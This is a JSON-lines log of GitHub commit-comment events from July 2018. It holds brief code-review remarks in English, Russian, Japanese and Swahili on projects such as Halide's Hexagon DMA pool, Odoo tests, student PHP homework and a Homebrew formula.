{"id":"7943008085","type":"CommitCommentEvent","actor":{"login":"mwojtkowski"},"repo":{"name":"mwojtkowski/Ovale"},"payload":{"comment":{"id":29654513,"position":null,"line":null,"path":null,"commit_id":"9924643cb4a507f1dfbfa402d46ca46797405454","created_at":"2018-07-10T10:53:27Z","updated_at":"2018-07-10T10:53:27Z","author_association":"OWNER","body":"thanks for letting me know about that Debug display problem. Fixed it now."}},"created_at":"2018-07-10T10:53:27Z"}
{"id":"7943008474","type":"CommitCommentEvent","actor":{"login":"fimaua"},"repo":{"name":"fimaua/Test-Project"},"payload":{"comment":{"id":29654516,"position":7,"line":7,"path":"index.js","commit_id":"fb1a60b4acec417a7bbec6d8135cea2a04db6a6f","created_at":"2018-07-10T10:53:32Z","updated_at":"2018-07-10T10:53:32Z","author_association":"OWNER","body":"Создаем файл и записываем в него текст."}},"created_at":"2018-07-10T10:53:32Z"}
{"id":"7943009455","type":"CommitCommentEvent","actor":{"login":"VadimZavgorodny"},"repo":{"name":"Gandalf1605/NewRepo2"},"payload":{"comment":{"id":29654518,"position":78,"line":76,"path":"index.php","commit_id":"fabf114c61879dd071dab877ea7a96b3df9a6ac9","created_at":"2018-07-10T10:53:45Z","updated_at":"2018-07-10T10:53:45Z","author_association":"COLLABORATOR","body":"Дальше по коду аналогично..."}},"created_at":"2018-07-10T10:53:45Z"}
{"id":"7943011593","type":"CommitCommentEvent","actor":{"login":"fimaua"},"repo":{"name":"fimaua/Test-Project"},"payload":{"comment":{"id":29654523,"position":9,"line":9,"path":"index.js","commit_id":"fb1a60b4acec417a7bbec6d8135cea2a04db6a6f","created_at":"2018-07-10T10:54:14Z","updated_at":"2018-07-10T10:54:14Z","author_association":"OWNER","body":"Добавляем текст в файл."}},"created_at":"2018-07-10T10:54:14Z"}
{"id":"7943012021","type":"CommitCommentEvent","actor":{"login":"Jrod898"},"repo":{"name":"deleteads/deleteads.github.io"},"payload":{"comment":{"id":29654525,"position":1,"line":1,"path":"README.md","commit_id":"862ca4fab308ad719a2b4e20ec1cf8045504bbad","created_at":"2018-07-10T10:54:20Z","updated_at":"2018-07-10T10:54:20Z","author_association":"NONE","body":"Thanks for the software "}},"created_at":"2018-07-10T10:54:20Z"}
{"id":"7943014456","type":"CommitCommentEvent","actor":{"login":"fimaua"},"repo":{"name":"fimaua/Test-Project"},"payload":{"comment":{"id":29654530,"position":11,"line":11,"path":"index.js","commit_id":"fb1a60b4acec417a7bbec6d8135cea2a04db6a6f","created_at":"2018-07-10T10:54:51Z","updated_at":"2018-07-10T10:54:51Z","author_association":"OWNER","body":"Читаем файл и показываем его содержимое."}},"created_at":"2018-07-10T10:54:51Z"}
{"id":"7943016992","type":"CommitCommentEvent","actor":{"login":"lukaskubanek"},"repo":{"name":"maicki/OrderedDictionary"},"payload":{"comment":{"id":29654538,"position":null,"line":null,"path":null,"commit_id":"f431034702c09e33176097db1fb9a1f85e61513f","created_at":"2018-07-10T10:55:25Z","updated_at":"2018-07-10T10:55:25Z","author_association":"NONE","body":"@maicki Is there any specific reason why you changed the type aliases for slice and collections types in the Swift <4.1 `#if` branch?"}},"created_at":"2018-07-10T10:55:25Z"}
{"id":"7943017306","type":"CommitCommentEvent","actor":{"login":"ddonchev"},"repo":{"name":"IvankaTashkova/MovieRent"},"payload":{"comment":{"id":29654540,"position":35,"line":104,"path":"src/main/java/movierent/controller/MovieController.java","commit_id":"4742eda554c59a0a3621b0ed742e66e0d94d2f6d","created_at":"2018-07-10T10:55:29Z","updated_at":"2018-07-10T10:55:29Z","author_association":"NONE","body":"again - see if user is authorized before modification of data"}},"created_at":"2018-07-10T10:55:29Z"}
{"id":"7943019624","type":"CommitCommentEvent","actor":{"login":"fimaua"},"repo":{"name":"fimaua/Test-Project"},"payload":{"comment":{"id":29654547,"position":25,"line":25,"path":"mailsender.js","commit_id":"fb1a60b4acec417a7bbec6d8135cea2a04db6a6f","created_at":"2018-07-10T10:56:01Z","updated_at":"2018-07-10T10:56:01Z","author_association":"OWNER","body":"Отправляем письмо, данные почты нужно ввести."}},"created_at":"2018-07-10T10:56:01Z"}
{"id":"7943019832","type":"CommitCommentEvent","actor":{"login":"sfraza"},"repo":{"name":"vgundlur/Halide"},"payload":{"comment":{"id":29654549,"position":13,"line":13,"path":"src/runtime/hexagon_dma_pool.h","commit_id":"99b292374683f1f6d22a26663a131e69c94647b6","created_at":"2018-07-10T10:56:04Z","updated_at":"2018-07-10T10:56:04Z","author_association":"COLLABORATOR","body":"In function create_dma_pool if pool is not initialized. We initialize it. \r\nAnd return a free dma engine  "}},"created_at":"2018-07-10T10:56:04Z"}
{"id":"7943022390","type":"CommitCommentEvent","actor":{"login":"sfraza"},"repo":{"name":"vgundlur/Halide"},"payload":{"comment":{"id":29654565,"position":199,"line":149,"path":"src/runtime/hexagon_dma_pool.cpp","commit_id":"99b292374683f1f6d22a26663a131e69c94647b6","created_at":"2018-07-10T10:56:38Z","updated_at":"2018-07-10T10:56:38Z","author_association":"COLLABORATOR","body":"Since DMA Engines are assigned to virtual engines during its lifetime, we need to know which virtual engine and which dma engine "}},"created_at":"2018-07-10T10:56:38Z"}
{"id":"7943022931","type":"CommitCommentEvent","actor":{"login":"sfraza"},"repo":{"name":"vgundlur/Halide"},"payload":{"comment":{"id":29654566,"position":173,"line":130,"path":"src/runtime/hexagon_dma_pool.cpp","commit_id":"99b292374683f1f6d22a26663a131e69c94647b6","created_at":"2018-07-10T10:56:45Z","updated_at":"2018-07-10T10:56:45Z","author_association":"COLLABORATOR","body":"Done "}},"created_at":"2018-07-10T10:56:45Z"}
{"id":"7943023450","type":"CommitCommentEvent","actor":{"login":"sfraza"},"repo":{"name":"vgundlur/Halide"},"payload":{"comment":{"id":29654567,"position":161,"line":127,"path":"src/runtime/hexagon_dma_pool.cpp","commit_id":"99b292374683f1f6d22a26663a131e69c94647b6","created_at":"2018-07-10T10:56:52Z","updated_at":"2018-07-10T10:56:52Z","author_association":"COLLABORATOR","body":"Done"}},"created_at":"2018-07-10T10:56:52Z"}
{"id":"7943023979","type":"CommitCommentEvent","actor":{"login":"VadimZavgorodny"},"repo":{"name":"Gandalf1605/NewRepo2"},"payload":{"comment":{"id":29654569,"position":137,"line":135,"path":"index.php","commit_id":"fabf114c61879dd071dab877ea7a96b3df9a6ac9","created_at":"2018-07-10T10:56:59Z","updated_at":"2018-07-10T10:56:59Z","author_association":"COLLABORATOR","body":"Понимаю, что пример, но старайся не использовать цифры в названиях"}},"created_at":"2018-07-10T10:56:59Z"}
{"id":"7943024258","type":"CommitCommentEvent","actor":{"login":"schlessera"},"repo":{"name":"wp-cli/i18n-command"},"payload":{"comment":{"id":29654571,"position":null,"line":null,"path":null,"commit_id":"b2cc682f6f77a6d9d494a69c184d9f4d4a0a8928","created_at":"2018-07-10T10:57:03Z","updated_at":"2018-07-10T10:57:03Z","author_association":"MEMBER","body":"@swissspidy No issue here, but please default to PRs in the future, not direct commits, even if it is only about a small change."}},"created_at":"2018-07-10T10:57:03Z"}
{"id":"7943025293","type":"CommitCommentEvent","actor":{"login":"piecioshka"},"repo":{"name":"tBlabs/CV"},"payload":{"comment":{"id":29654573,"position":5,"line":null,"path":"README.md","commit_id":"fe0c0fcff86cac62897c519792c116c727fc7df6","created_at":"2018-07-10T10:57:17Z","updated_at":"2018-07-10T10:57:17Z","author_association":"NONE","body":"GIT -> Git"}},"created_at":"2018-07-10T10:57:17Z"}
{"id":"7943026779","type":"CommitCommentEvent","actor":{"login":"aab-odoo"},"repo":{"name":"odoo-dev/odoo"},"payload":{"comment":{"id":29654574,"position":1,"line":13052,"path":"addons/web/static/tests/fields/relational_fields_tests.js","commit_id":"a3b04e4527690d87b1676a2f8b03df367109f073","created_at":"2018-07-10T10:57:35Z","updated_at":"2018-07-10T10:57:35Z","author_association":"NONE","body":"move this test in the correct module"}},"created_at":"2018-07-10T10:57:35Z"}
{"id":"7943027088","type":"CommitCommentEvent","actor":{"login":"sfraza"},"repo":{"name":"vgundlur/Halide"},"payload":{"comment":{"id":29654575,"position":115,"line":92,"path":"src/runtime/hexagon_dma_pool.cpp","commit_id":"99b292374683f1f6d22a26663a131e69c94647b6","created_at":"2018-07-10T10:57:39Z","updated_at":"2018-07-10T10:57:39Z","author_association":"COLLABORATOR","body":"We can call Finish_Frame in free_dma_engine. But since the test on device was running properly, without it. I did not add it. Please advice "}},"created_at":"2018-07-10T10:57:39Z"}
{"id":"7943027653","type":"CommitCommentEvent","actor":{"login":"aab-odoo"},"repo":{"name":"odoo-dev/odoo"},"payload":{"comment":{"id":29654576,"position":15,"line":13066,"path":"addons/web/static/tests/fields/relational_fields_tests.js","commit_id":"a3b04e4527690d87b1676a2f8b03df367109f073","created_at":"2018-07-10T10:57:46Z","updated_at":"2018-07-10T10:57:46Z","author_association":"NONE","body":"remove turtle_int"}},"created_at":"2018-07-10T10:57:46Z"}
{"id":"7943028059","type":"CommitCommentEvent","actor":{"login":"sfraza"},"repo":{"name":"vgundlur/Halide"},"payload":{"comment":{"id":29654577,"position":91,"line":66,"path":"src/runtime/hexagon_dma_pool.cpp","commit_id":"99b292374683f1f6d22a26663a131e69c94647b6","created_at":"2018-07-10T10:57:51Z","updated_at":"2018-07-10T10:57:51Z","author_association":"COLLABORATOR","body":"Done "}},"created_at":"2018-07-10T10:57:51Z"}
{"id":"7943028858","type":"CommitCommentEvent","actor":{"login":"sfraza"},"repo":{"name":"vgundlur/Halide"},"payload":{"comment":{"id":29654579,"position":105,"line":82,"path":"src/runtime/hexagon_dma_pool.cpp","commit_id":"99b292374683f1f6d22a26663a131e69c94647b6","created_at":"2018-07-10T10:58:01Z","updated_at":"2018-07-10T10:58:01Z","author_association":"COLLABORATOR","body":"Send the design document for this "}},"created_at":"2018-07-10T10:58:01Z"}
{"id":"7943029681","type":"CommitCommentEvent","actor":{"login":"schlessera"},"repo":{"name":"wp-cli/i18n-command"},"payload":{"comment":{"id":29654582,"position":null,"line":null,"path":null,"commit_id":"b2cc682f6f77a6d9d494a69c184d9f4d4a0a8928","created_at":"2018-07-10T10:58:12Z","updated_at":"2018-07-10T10:58:12Z","author_association":"MEMBER","body":"Huh? I swear Github showed me this commit on `master`... Nevermind!"}},"created_at":"2018-07-10T10:58:12Z"}
{"id":"7943030836","type":"CommitCommentEvent","actor":{"login":"erhmeh"},"repo":{"name":"erhmeh/Compuhypermeganet"},"payload":{"comment":{"id":29654583,"position":27,"line":27,"path":"Main Project/src/main.cpp","commit_id":"5f53b436ceafd2278cb100449f75ffe8fc7ccca6","created_at":"2018-07-10T10:58:28Z","updated_at":"2018-07-10T10:58:28Z","author_association":"OWNER","body":"Yay or nay to this"}},"created_at":"2018-07-10T10:58:28Z"}
{"id":"7943031178","type":"CommitCommentEvent","actor":{"login":"sfraza"},"repo":{"name":"vgundlur/Halide"},"payload":{"comment":{"id":29654585,"position":64,"line":51,"path":"src/runtime/hexagon_dma_pool.cpp","commit_id":"99b292374683f1f6d22a26663a131e69c94647b6","created_at":"2018-07-10T10:58:32Z","updated_at":"2018-07-10T10:58:32Z","author_association":"COLLABORATOR","body":"For all failure conditions we are returning NULL which will assert in hexagon_dma.cpp "}},"created_at":"2018-07-10T10:58:32Z"}
{"id":"7943031795","type":"CommitCommentEvent","actor":{"login":"aab-odoo"},"repo":{"name":"odoo-dev/odoo"},"payload":{"comment":{"id":29654586,"position":34,"line":13085,"path":"addons/web/static/tests/fields/relational_fields_tests.js","commit_id":"a3b04e4527690d87b1676a2f8b03df367109f073","created_at":"2018-07-10T10:58:41Z","updated_at":"2018-07-10T10:58:41Z","author_association":"NONE","body":"check that the first line has been validated with the correct value (ninja), and that a second line has been created in edition"}},"created_at":"2018-07-10T10:58:41Z"}
{"id":"7943032948","type":"CommitCommentEvent","actor":{"login":"sfraza"},"repo":{"name":"vgundlur/Halide"},"payload":{"comment":{"id":29654587,"position":57,"line":44,"path":"src/runtime/hexagon_dma_pool.cpp","commit_id":"99b292374683f1f6d22a26663a131e69c94647b6","created_at":"2018-07-10T10:58:56Z","updated_at":"2018-07-10T10:58:56Z","author_association":"COLLABORATOR","body":"4 is the max_number_of_work_units "}},"created_at":"2018-07-10T10:58:56Z"}
{"id":"7943033149","type":"CommitCommentEvent","actor":{"login":"xwavex"},"repo":{"name":"cogimon/rtt-gazebo-robot-sim"},"payload":{"comment":{"id":29654588,"position":null,"line":null,"path":null,"commit_id":"a9877054d8e89c9258e961b48f717d2bbedbcc91","created_at":"2018-07-10T10:58:59Z","updated_at":"2018-07-10T10:58:59Z","author_association":"MEMBER","body":"Also does not work for me, since I do not have XBotCoreInterface... Can we make this catkin agnostic?"}},"created_at":"2018-07-10T10:58:59Z"}
{"id":"7943034178","type":"CommitCommentEvent","actor":{"login":"ddt-mentor"},"repo":{"name":"ddt-yokomizo/meikaiJAVA_yokomizo"},"payload":{"comment":{"id":29654589,"position":359,"line":359,"path":"DDT-work/java12/day/Day.java","commit_id":"92a892f99be3042ca2fcfedb8a6322906ff8f8cc","created_at":"2018-07-10T10:59:12Z","updated_at":"2018-07-10T10:59:12Z","author_association":"COLLABORATOR","body":"関数の中身を単純にplusSomeDays(1)とすれば１行で済むので、そちらで行きましょう(石井)"}},"created_at":"2018-07-10T10:59:12Z"}
{"id":"7943046644","type":"CommitCommentEvent","actor":{"login":"ddt-mentor"},"repo":{"name":"ddt-yokomizo/meikaiJAVA_yokomizo"},"payload":{"comment":{"id":29654627,"position":445,"line":445,"path":"DDT-work/java12/day/Day.java","commit_id":"92a892f99be3042ca2fcfedb8a6322906ff8f8cc","created_at":"2018-07-10T11:01:40Z","updated_at":"2018-07-10T11:01:40Z","author_association":"COLLABORATOR","body":"こちらも関数の中身を単純にminusSomeDays(1)とすれば１行で済むので、そちらで行きましょう(石井)"}},"created_at":"2018-07-10T11:01:40Z"}
{"id":"7943051192","type":"CommitCommentEvent","actor":{"login":"hhromic"},"repo":{"name":"agherzan/meta-raspberrypi"},"payload":{"comment":{"id":29654632,"position":null,"line":null,"path":null,"commit_id":"e713c3f60d74fbb864122f8f11a80ca302d53da3","created_at":"2018-07-10T11:02:38Z","updated_at":"2018-07-10T11:02:38Z","author_association":"CONTRIBUTOR","body":"@kraj, looks like you sent some fixes related to the weston error to userland some time ago:\r\nhttps://github.com/raspberrypi/userland/pull/290/commits/3e9b9d4088d74e9613a318ae79b260ffbe429fd3\r\nbut never merged. The PR seems to be going to be abandoned."}},"created_at":"2018-07-10T11:02:38Z"}
{"id":"7943053142","type":"CommitCommentEvent","actor":{"login":"ddonchev"},"repo":{"name":"IvankaTashkova/MovieRent"},"payload":{"comment":{"id":29654633,"position":26,"line":66,"path":"src/main/java/movierent/model/Movie.java","commit_id":"ff01571c6b6523705f6c1c355ffa7197b01488c5","created_at":"2018-07-10T11:03:03Z","updated_at":"2018-07-10T11:03:03Z","author_association":"NONE","body":"Is the end date evaluated for expiration anywhere?"}},"created_at":"2018-07-10T11:03:03Z"}
{"id":"7943053288","type":"CommitCommentEvent","actor":{"login":"aab-odoo"},"repo":{"name":"odoo-dev/odoo"},"payload":{"comment":{"id":29654634,"position":11,"line":774,"path":"addons/web/static/src/js/views/list/list_editable_renderer.js","commit_id":"a3b04e4527690d87b1676a2f8b03df367109f073","created_at":"2018-07-10T11:03:05Z","updated_at":"2018-07-10T11:03:05Z","author_association":"NONE","body":"widget.$('input').length"}},"created_at":"2018-07-10T11:03:05Z"}
{"id":"7943057907","type":"CommitCommentEvent","actor":{"login":"dariusdev"},"repo":{"name":"AigangNetwork/aigang-platform-contracts-insurance"},"payload":{"comment":{"id":29654649,"position":null,"line":null,"path":null,"commit_id":"81bebe24897dc8a9c926486c4da4fb1c64e061f3","created_at":"2018-07-10T11:04:08Z","updated_at":"2018-07-10T11:04:08Z","author_association":"MEMBER","body":"setPayout function is missing"}},"created_at":"2018-07-10T11:04:08Z"}
{"id":"7943059225","type":"CommitCommentEvent","actor":{"login":"ddonchev"},"repo":{"name":"IvankaTashkova/MovieRent"},"payload":{"comment":{"id":29654654,"position":8,"line":8,"path":"src/main/java/movierent/model/SendEmail.java","commit_id":"db8e71e43ae04d2994a9a07bc9bc84c4159dbad4","created_at":"2018-07-10T11:04:25Z","updated_at":"2018-07-10T11:04:25Z","author_association":"NONE","body":"tip: Class names should refer to objects. Method names should be verbes"}},"created_at":"2018-07-10T11:04:25Z"}
{"id":"7943064254","type":"CommitCommentEvent","actor":{"login":"RobertsG"},"repo":{"name":"sc0Vu/web3.php"},"payload":{"comment":{"id":29654668,"position":5,"line":39,"path":"src/Contracts/Types/Bytes.php","commit_id":"87dbe235a4068aa06f182d1f72b9bd3b6f4d06f7","created_at":"2018-07-10T11:05:31Z","updated_at":"2018-07-10T11:05:31Z","author_association":"NONE","body":"There is an issue with this check now because the \"?\" Symbol was removed, as a result of this preg_match does not match for 'bytes'.\r\n\r\nThe correct version should be:\r\n\"return (preg_match('/^bytes([0-9]{1,})?(\\[([0-9]*)\\])*$/', $name) === 1);\""}},"created_at":"2018-07-10T11:05:31Z"}
{"id":"7943064972","type":"CommitCommentEvent","actor":{"login":"idik115"},"repo":{"name":"idik115/lesson"},"payload":{"comment":{"id":29654669,"position":null,"line":null,"path":null,"commit_id":"711b346f0e733c487d5c5d68d7caa7f3e5b4fa9f","created_at":"2018-07-10T11:05:41Z","updated_at":"2018-07-10T11:05:41Z","author_association":"OWNER","body":"Сделал функцию Draw"}},"created_at":"2018-07-10T11:05:41Z"}
{"id":"7943069123","type":"CommitCommentEvent","actor":{"login":"gusc"},"repo":{"name":"Homebrew/homebrew-core"},"payload":{"comment":{"id":29654676,"position":16,"line":16,"path":"Formula/carthage.rb","commit_id":"f74d9ba598c9843552450abeb382cacd0e71d4c0","created_at":"2018-07-10T11:06:34Z","updated_at":"2018-07-10T11:06:34Z","author_association":"NONE","body":"How is the `depends_on :macos` supposed to act? Will the formula still be downloaded and proposed as an upgrade on `brew update & brew upgrade`?\r\n\r\nI downloaded the formula and added the macOS dependency - it didn't complain about the Xcode any more, but now it complains about macOS. So I'm hoping that brew would see the dependency and ignore the new version."}},"created_at":"2018-07-10T11:06:34Z"}
{"id":"7943076862","type":"CommitCommentEvent","actor":{"login":"sirTribble"},"repo":{"name":"mwojtkowski/Ovale"},"payload":{"comment":{"id":29654695,"position":null,"line":null,"path":null,"commit_id":"9924643cb4a507f1dfbfa402d46ca46797405454","created_at":"2018-07-10T11:08:17Z","updated_at":"2018-07-10T11:08:17Z","author_association":"NONE","body":"I'm actually use custom scripts for healing specs (mainly for holy pal and disc priest) and relay heavily on \"mouseover\" and \"party№\" unit ID, so i do not need to switch targets.\r\nOriginal code allows usage of any type of unitID as \"target\" prefix to functions, so It is also a very powerful tool for custom scripts for specific bosses ( especially \"focus\" UnitID) and challenges like mage tower as well.\r\nAdditionally I believe also that function like \"BuffCountOnAny\" relays on scanning all nameplates.\r\n\r\nThank you for you replay! You making an amazing job with updating ovale! thank you very MUCH! :)"}},"created_at":"2018-07-10T11:08:17Z"}
{"id":"7943077480","type":"CommitCommentEvent","actor":{"login":"celturbo"},"repo":{"name":"celturbo/Teste-proje"},"payload":{"comment":{"id":29654698,"position":1,"line":1,"path":"teste logica","commit_id":"222c1b03e500b76aa1bd78e7c3e28483799f82c3","created_at":"2018-07-10T11:08:24Z","updated_at":"2018-07-10T11:08:24Z","author_association":"OWNER","body":"gfhs\r\n"}},"created_at":"2018-07-10T11:08:24Z"}
{"id":"7943082247","type":"CommitCommentEvent","actor":{"login":"chernyshev-alexander"},"repo":{"name":"Ravi-Shekhar/dsalgo"},"payload":{"comment":{"id":29654710,"position":null,"line":null,"path":null,"commit_id":"5f853f1d33ea5af0ecd32bac6622007405232d1d","created_at":"2018-07-10T11:09:27Z","updated_at":"2018-07-10T11:09:27Z","author_association":"NONE","body":"got it.   thank you Ravi"}},"created_at":"2018-07-10T11:09:27Z"}
{"id":"7943085217","type":"CommitCommentEvent","actor":{"login":"nielsrolf"},"repo":{"name":"MuhammadTaha/Predictive-Analysis"},"payload":{"comment":{"id":29654718,"position":null,"line":null,"path":null,"commit_id":"fd6b091bc45a468057206c59f71126a868cc0cf7","created_at":"2018-07-10T11:10:08Z","updated_at":"2018-07-10T11:10:08Z","author_association":"COLLABORATOR","body":"I get an import error now:\r\n\r\n```\r\n>> python src/main.py try\r\n...\r\nfrom src.data.data_extraction import DATA_DIR, DATA_PICKLE_FILE\r\nModuleNotFoundError: No module named 'src'\r\n\r\n>> cd src\r\n>> python test.py\r\n...\r\nModuleNotFoundError: No module named 'src'\r\n``` \r\n\r\nWhat Python version are you using, @mshaban ? Can you add an environment.yml or something similar? I think that imports work different on our systems is probably due to different python versions. I am using Python 3.6.1 :: Anaconda 4.4.0 (64-bit) "}},"created_at":"2018-07-10T11:10:08Z"}
{"id":"7943087708","type":"CommitCommentEvent","actor":{"login":"ddt-mentor"},"repo":{"name":"shikamaY/meikaiJava_shikama"},"payload":{"comment":{"id":29654720,"position":11,"line":11,"path":"java_ensyu/src/Ensyu9/Ensyu9_1.java","commit_id":"67dcc45672a36b790cde08c5340b3fe85ceeb98c","created_at":"2018-07-10T11:10:41Z","updated_at":"2018-07-10T11:10:41Z","author_association":"COLLABORATOR","body":"humanの複数形はhumansらしいです。(石井)"}},"created_at":"2018-07-10T11:10:41Z"}
{"id":"7943090430","type":"CommitCommentEvent","actor":{"login":"VadimZavgorodny"},"repo":{"name":"toshderv/beetrootHomework"},"payload":{"comment":{"id":29654726,"position":350,"line":354,"path":"HomeWork_08_07_18/index.php","commit_id":"b877c10c6818141396aa0204b5a8dd9750d52b6e","created_at":"2018-07-10T11:11:17Z","updated_at":"2018-07-10T11:11:17Z","author_association":"COLLABORATOR","body":"Как вариант: $firstArr['element'] = 'cyrcle';"}},"created_at":"2018-07-10T11:11:17Z"}
{"id":"7943096861","type":"CommitCommentEvent","actor":{"login":"cedricmessiant"},"repo":{"name":"assembl/assembl"},"payload":{"comment":{"id":29654741,"position":22,"line":22,"path":"assembl/static2/js/app/components/common/tabbedContent.jsx","commit_id":"279e43da136004a4370ae0d3d58b1e584dfad4bf","created_at":"2018-07-10T11:12:41Z","updated_at":"2018-07-10T11:12:41Z","author_association":"CONTRIBUTOR","body":"it would have been a good idea to use it indeed..."}},"created_at":"2018-07-10T11:12:41Z"}
{"id":"7943100723","type":"CommitCommentEvent","actor":{"login":"NickKaramoff"},"repo":{"name":"project-six/it-museum"},"payload":{"comment":{"id":29654754,"position":null,"line":null,"path":null,"commit_id":"9de81eadd6a17124edbf30e5c758718bac0034e5","created_at":"2018-07-10T11:13:34Z","updated_at":"2018-07-10T11:13:34Z","author_association":"CONTRIBUTOR","body":"![](https://github.trello.services/images/mini-trello-icon.png) [Написать код модели и привязать к БД](https://trello.com/c/i0YzQ0Wm/28-%D0%BD%D0%B0%D0%BF%D0%B8%D1%81%D0%B0%D1%82%D1%8C-%D0%BA%D0%BE%D0%B4-%D0%BC%D0%BE%D0%B4%D0%B5%D0%BB%D0%B8-%D0%B8-%D0%BF%D1%80%D0%B8%D0%B2%D1%8F%D0%B7%D0%B0%D1%82%D1%8C-%D0%BA-%D0%B1%D0%B4)"}},"created_at":"2018-07-10T11:13:34Z"}
{"id":"7943108612","type":"CommitCommentEvent","actor":{"login":"jamflying"},"repo":{"name":"jamflying/jamflying.github.io"},"payload":{"comment":{"id":29654775,"position":null,"line":null,"path":null,"commit_id":"d155b55287051fbe53088baf0ce46e186770797a","created_at":"2018-07-10T11:15:17Z","updated_at":"2018-07-10T11:15:17Z","author_association":"OWNER","body":"recover it"}},"created_at":"2018-07-10T11:15:17Z"}
{"id":"7943109085","type":"CommitCommentEvent","actor":{"login":"Evansmkamau"},"repo":{"name":"Evansmkamau/Repo-ya-Pili"},"payload":{"comment":{"id":29654781,"position":null,"line":null,"path":null,"commit_id":"ee7863fad8cd32ec48bdb013cdaab1176879ac54","created_at":"2018-07-10T11:15:23Z","updated_at":"2018-07-10T11:15:23Z","author_association":"OWNER","body":"wawawaaa kumbe nimefanya changes kwa master!!!"}},"created_at":"2018-07-10T11:15:23Z"}
{"id":"7943114872","type":"CommitCommentEvent","actor":{"login":"xxuejie"},"repo":{"name":"NervosFoundation/rust-rocksdb"},"payload":{"comment":{"id":29654790,"position":10,"line":10,"path":"tests/test_pinnable_slice.rs","commit_id":"f4bdb623c1ff1eb7d7ec846986cb166090916c95","created_at":"2018-07-10T11:16:36Z","updated_at":"2018-07-10T11:16:36Z","author_association":"COLLABORATOR","body":"The reason is if you look at [here](https://github.com/spacejam/rust-rocksdb/blob/master/rustfmt.toml#L4), the original config file in this project is configured to always include trailing comma, you can also see in this [file](https://github.com/spacejam/rust-rocksdb/blob/master/src/db.rs#L753) that there're many cases in the original project that uses trailing comma. So it's really about preserving existing conventions here."}},"created_at":"2018-07-10T11:16:36Z"}
{"id":"7943115910","type":"CommitCommentEvent","actor":{"login":"VadimZavgorodny"},"repo":{"name":"breusovigor/Home_work_1"},"payload":{"comment":{"id":29654793,"position":82,"line":125,"path":"index.php","commit_id":"d9300936e0aec70d94bcb3f1d0fecbe49f7857ba","created_at":"2018-07-10T11:16:51Z","updated_at":"2018-07-10T11:16:51Z","author_association":"COLLABORATOR","body":"Можешь просто проверять :\r\n`if ($_GET['send']) {\r\n}`\r\nНе забывай про скобки"}},"created_at":"2018-07-10T11:16:51Z"}
{"id":"7943116786","type":"CommitCommentEvent","actor":{"login":"ccw808"},"repo":{"name":"multitheftauto/mtasa-blue"},"payload":{"comment":{"id":29654797,"position":5,"line":66,"path":"README.md","commit_id":"021e66504c7d3b8a753f7d97b2dd9b8ba6f6a045","created_at":"2018-07-10T11:17:03Z","updated_at":"2018-07-10T11:17:03Z","author_association":"MEMBER","body":"_Just_ is unnecessary here"}},"created_at":"2018-07-10T11:17:03Z"}
{"id":"7943121429","type":"CommitCommentEvent","actor":{"login":"JacquesCarette"},"repo":{"name":"JacquesCarette/Drasil"},"payload":{"comment":{"id":29654819,"position":null,"line":null,"path":null,"commit_id":"82684d9a7d04b78de3ccb94e3bb85200382da568","created_at":"2018-07-10T11:18:04Z","updated_at":"2018-07-10T11:18:04Z","author_association":"OWNER","body":"I wonder if `Drasil.SRS` should really be called `Drasil.DocLang.SRS` ?"}},"created_at":"2018-07-10T11:18:04Z"}
{"id":"7943126935","type":"CommitCommentEvent","actor":{"login":"VadimZavgorodny"},"repo":{"name":"Gandalf1605/NewRepo2"},"payload":{"comment":{"id":29654840,"position":202,"line":200,"path":"index.php","commit_id":"fabf114c61879dd071dab877ea7a96b3df9a6ac9","created_at":"2018-07-10T11:19:17Z","updated_at":"2018-07-10T11:19:17Z","author_association":"COLLABORATOR","body":"Не забывай ставить пробелы перед `{`"}},"created_at":"2018-07-10T11:19:17Z"}
{"id":"7943129624","type":"CommitCommentEvent","actor":{"login":"VadimZavgorodny"},"repo":{"name":"Gandalf1605/NewRepo2"},"payload":{"comment":{"id":29654854,"position":56,"line":54,"path":"index.php","commit_id":"fabf114c61879dd071dab877ea7a96b3df9a6ac9","created_at":"2018-07-10T11:19:53Z","updated_at":"2018-07-10T11:19:53Z","author_association":"COLLABORATOR","body":"Temp - Не сокращай"}},"created_at":"2018-07-10T11:19:53Z"}
{"id":"7943130642","type":"CommitCommentEvent","actor":{"login":"whezel"},"repo":{"name":"NectarJS/nectarscript"},"payload":{"comment":{"id":29654857,"position":null,"line":null,"path":null,"commit_id":"63cbb5af7f33288a6933253c2f72dfdf3ca8368a","created_at":"2018-07-10T11:20:07Z","updated_at":"2018-07-10T11:20:07Z","author_association":"NONE","body":"nectarscript\r\n"}},"created_at":"2018-07-10T11:20:07Z"}
{"id":"7943132209","type":"CommitCommentEvent","actor":{"login":"sfraza"},"repo":{"name":"vgundlur/Halide"},"payload":{"comment":{"id":29654864,"position":84,"line":359,"path":"src/runtime/hexagon_dma.cpp","commit_id":"99b292374683f1f6d22a26663a131e69c94647b6","created_at":"2018-07-10T11:20:26Z","updated_at":"2018-07-10T11:20:26Z","author_association":"COLLABORATOR","body":"Done"}},"created_at":"2018-07-10T11:20:26Z"}
{"id":"7943132946","type":"CommitCommentEvent","actor":{"login":"sfraza"},"repo":{"name":"vgundlur/Halide"},"payload":{"comment":{"id":29654865,"position":12,"line":14,"path":"src/runtime/hexagon_dma_pool.cpp","commit_id":"99b292374683f1f6d22a26663a131e69c94647b6","created_at":"2018-07-10T11:20:36Z","updated_at":"2018-07-10T11:20:36Z","author_association":"COLLABORATOR","body":"Done"}},"created_at":"2018-07-10T11:20:36Z"}
{"id":"7943133445","type":"CommitCommentEvent","actor":{"login":"sfraza"},"repo":{"name":"vgundlur/Halide"},"payload":{"comment":{"id":29654870,"position":40,"line":27,"path":"src/runtime/hexagon_dma_pool.cpp","commit_id":"99b292374683f1f6d22a26663a131e69c94647b6","created_at":"2018-07-10T11:20:42Z","updated_at":"2018-07-10T11:20:42Z","author_association":"COLLABORATOR","body":"Done"}},"created_at":"2018-07-10T11:20:42Z"}
{"id":"7943134139","type":"CommitCommentEvent","actor":{"login":"sfraza"},"repo":{"name":"vgundlur/Halide"},"payload":{"comment":{"id":29654871,"position":48,"line":35,"path":"src/runtime/hexagon_dma_pool.cpp","commit_id":"99b292374683f1f6d22a26663a131e69c94647b6","created_at":"2018-07-10T11:20:51Z","updated_at":"2018-07-10T11:20:51Z","author_association":"COLLABORATOR","body":"Added Scoped Mutex Lock"}},"created_at":"2018-07-10T11:20:51Z"}
